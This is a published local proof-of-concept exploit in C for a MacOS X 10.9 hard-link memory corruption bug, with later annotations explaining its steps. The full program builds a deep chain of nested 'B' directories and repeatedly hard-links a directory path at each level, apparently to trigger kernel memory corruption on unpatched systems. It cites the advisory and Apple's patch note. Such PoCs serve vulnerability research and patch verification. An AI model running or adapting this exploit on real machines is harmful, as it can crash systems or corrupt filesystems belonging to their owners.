MacOS X 10.9 Hard Link Memory Corruption PoC

2014.10.19
Risk: High
Local: Yes
Remote: No
CWE: CWE-119

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/param.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <err.h>
#include <errno.h>
#include <locale.h>

/*
MacOS X 10.9 Hard Link Memory Corruption PoC

Maksymilian Arciemowicz
http://cxsecurity.com/
http://cert.cx/
*/

/*
 * Reader's summary (derived from the code below):
 *   1. Create a directory "B" in the current working directory and descend
 *      into any existing B/B/... chain, counting the depth already present.
 *   2. Extend that chain until the depth reaches the value given in argv[1].
 *   3. Walk back up one level at a time, calling link(2) eight times per
 *      level with the directory path "B/B" as the source and "X1".."X8" as
 *      the new names.
 * Observable behaviour for triage: a nested tree of directories all named
 * "B", plus repeated link(2) calls whose source is a directory, issued from
 * successively shallower working directories.
 * NOTE(review): the page classifies this as CWE-119 but the listing does not
 * show where the corruption happens; presumably it is in the OS handling of
 * the resulting links -- confirm against the referenced advisories.
 */

/*
 * mkpath -- create every component of `path`, like `mkdir -p`.
 *
 * path     : writable string; it is edited in place while walking (each '/'
 *            is temporarily overwritten with '\0' and then restored).
 * mode     : permissions for the final component.
 * dir_mode : permissions for the intermediate components.
 *
 * Returns 0 on success, -1 after printing a warn() message on failure.
 * A component that already exists as a directory is not an error.
 * On the error returns the temporary '\0' is not restored, so `path` is left
 * truncated at the failing component.
 */
int mkpath(char *path, mode_t mode, mode_t dir_mode){
	struct stat sb;
	char *slash;
	int done,rv;

	done=0;
	slash=path;

	for(;;){
		/* Skip any run of '/' and then advance to the end of the next component. */
		slash += strspn(slash,"/");
		slash += strcspn(slash,"/");

		/* done is true once the component just scanned is the last one. */
		done = (*slash=='\0');
		*slash = '\0';

		rv = mkdir(path, done ? mode : dir_mode);
		if(rv < 0){
			/* Keep mkdir's errno: stat() below may overwrite it. */
			int sverrno;
			sverrno = errno;
			if(stat(path,&sb)<0){
				/* Path does not exist at all: report the original mkdir error. */
				errno=sverrno;
				warn("%s",path);
				return -1;
			}
			if(!S_ISDIR(sb.st_mode)){
				/* Something exists here but it is not a directory. */
				errno = ENOTDIR;
				warn("%s",path);
				return -1;
			}
		} else if (done){
			/* Final component was newly created: set its mode explicitly. */
			if((chmod(path,mode)== -1)) {
				warn("%s",path);
				return -1;
			}
		}
		if(done){ break; }
		/* Put the separator back and continue with the next component. */
		*slash = '/';
	}
	return 0;
}

/*
 * main -- expects exactly one argument, the target nesting depth (parsed
 * with atoi, so non-numeric input silently becomes 0).
 *
 * Everything happens relative to the current working directory; the "B"
 * tree and any "X1".."X8" entries that link(2) manages to create are left
 * behind when the program exits.
 * Returns 1 on wrong usage, 0 otherwise (failures of mkpath, chdir and link
 * do not change the exit status).
 */
int main(int argc, char *argv[]){
	if(argc!=2){
		printf("Use it with (int)arg[1]\n");
		return 1;
	}
	int wbita=atoi(argv[1]);	/* requested depth; no range or error checking */
	/* Names of the eight links attempted at every level. The explicit "\0"
	   is redundant: a string literal is already NUL-terminated. */
	char symn1[]="X1\0";
	char symn2[]="X2\0";
	char symn3[]="X3\0";
	char symn4[]="X4\0";
	char symn5[]="X5\0";
	char symn6[]="X6\0";
	char symn7[]="X7\0";
	char symn8[]="X8\0";
	char buff[]="B\0";	/* name used for every directory in the chain */
	char cd[]="..\0";
	char *sym;	/* will hold "B/B", the source path passed to link() */
	FILE *fp;	/* NOTE(review): never used in this listing */
	int level=0;	/* depth of the B/B/... chain that already exists */
	mode_t mode,dir_mode;

	/* strlen("B")*2 + 2 = 4 bytes: exactly "B/B" plus the terminator.
	   NOTE(review): the malloc result is not checked before use. */
	sym=malloc(((strlen(buff)*2)+2)*sizeof(char));
	/* umask(0) returns the previous mask and leaves the process umask at 0
	   for the rest of the run; mode is 0777 minus the previous mask. */
	mode = ((S_IRWXU | S_IRWXG | S_IRWXO) & ~umask(0));
	dir_mode = mode | S_IWUSR |S_IXUSR;

	/* NOTE(review): mkpath's return value is ignored here and below. */
	mkpath(buff,mode,dir_mode);
	/* Descend through whatever B/B/... chain already exists (for example
	   from an earlier run) until chdir fails; level counts the successes. */
	while(1) // Phase 0
		if(0!=chdir(buff)){
			printf("Phase 0 done\n");
			break;
		}
		else printf("Next %i\n",level++);

	/* Build the relative path "B/B". */
	strcpy(sym,buff);
	strcat(sym,"/");
	strcat(sym,buff);

	/* Extend the chain from the current depth up to the requested depth. */
	for(int ax=level; ax<wbita; ax++){
		mkpath(buff,mode,dir_mode);
		printf("Directory created Level: %i\n",ax);
		if(0!=chdir(buff)){
			printf("Error. chdir() failed.");
			break;
		}
	}
	/* Make two more levels and step back up once, so that "B/B" resolves
	   from the working directory the link loop starts in.
	   NOTE(review): these chdir() results are not checked. */
	mkpath(buff,mode,dir_mode);
	chdir(buff);
	mkpath(buff,mode,dir_mode);
	chdir(cd);

	//Let's create hardlinks and cd .. loop
	/* Per level: eight link(2) calls with the directory "B/B" as source,
	   each return value printed (0 or -1), then one step up the tree. The
	   loop runs the same number of times as the extension loop above. */
	for(int ax=level; ax<wbita; ax++){
		printf("Link1(%s,%s)=%i; cd ..\n",sym,symn1,link(sym,symn1));
		printf("Link2(%s,%s)=%i; cd ..\n",sym,symn2,link(sym,symn2));
		printf("Link3(%s,%s)=%i; cd ..\n",sym,symn3,link(sym,symn3));
		printf("Link4(%s,%s)=%i; cd ..\n",sym,symn4,link(sym,symn4));
		printf("Link5(%s,%s)=%i; cd ..\n",sym,symn5,link(sym,symn5));
		printf("Link6(%s,%s)=%i; cd ..\n",sym,symn6,link(sym,symn6));
		printf("Link7(%s,%s)=%i; cd ..\n",sym,symn7,link(sym,symn7));
		printf("Link8(%s,%s)=%i; cd ..\n",sym,symn8,link(sym,symn8));
		if(0!=chdir(cd)){
			printf("Error. chdir failed!");
			break;
		}
	}
	return 0;
}

References:

http://cxsecurity.com/issue/WLB-2014040027
http://support.apple.com/kb/HT6535

